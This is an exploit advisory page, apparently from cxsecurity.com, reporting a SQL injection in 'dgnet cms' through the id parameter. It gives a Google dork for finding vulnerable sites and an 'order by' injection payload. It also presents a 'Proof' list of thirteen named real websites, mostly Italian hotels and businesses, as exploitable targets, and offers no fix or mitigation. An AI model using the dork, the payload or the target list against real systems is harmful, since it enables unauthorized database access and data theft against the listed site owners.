dgnet cms SQL Injection

2018.04.04
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

|=============================================================| |-------------------In The Name Of God------------------------| | | Exploit Title: dgnet cms SQL Injection | | Exploit Author: Ashiyane Digital Security Team | | Vendor Homepage:http://www.dgnet.it | | Google Dork : intext:"dgNet webDesign" & inurl:/.php?id= | | Tested on: Windows 10 ~~~> Google Chrome | | vulnerable path : /*.php ? id = [SQL Injection] | | Date: Wednesday - 2018 04 April |==============================================| | Discreaption : | | If you need a bypass, you can use the String method like this : | id=1' order by 999-- - |==============================================| | Proof : | | http://www.style-brokers.com/en-details.php?id=1282 | | http://www.relaistrevi95.com/en-offers-details.php?id=16 | | http://www.villafabbroni.com/td/angebote-detail.php?id=7 | | http://www.hotelriparoma.com/en/hotel-downtown-rome/offer-details.php?id=81 | | http://www.hotelilnegresco.com/zh/territorio-dettaglio.php?id=55 | | http://www.granduomo.com/en/offerte-speciali-dettaglio.php?id=19 | | http://www.floraliadecor.it/en/storie-dettaglio.php?id=11 | | http://www.capritiberiopalace.it/en-special-offers-details.php?id=33 | | http://www.poiano.com/en/spa_detail.php?id=29 | | http://www.granduomo.com/en/offerte-speciali-dettaglio.php?id=19 | | http://www.anticatorre.com/eng-news-dettaglio.php?id=13 | | http://www.ilselvino.com/en/offerta-dettaglio.php?id=142 | | http://www.ttpartnersimmobiliare.com/ing-stampaDettaglio.php?id=3021 | |============================================================= | Discovered By : sir shahroukh |=============================================================


Vote for this issue:
20%
80%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top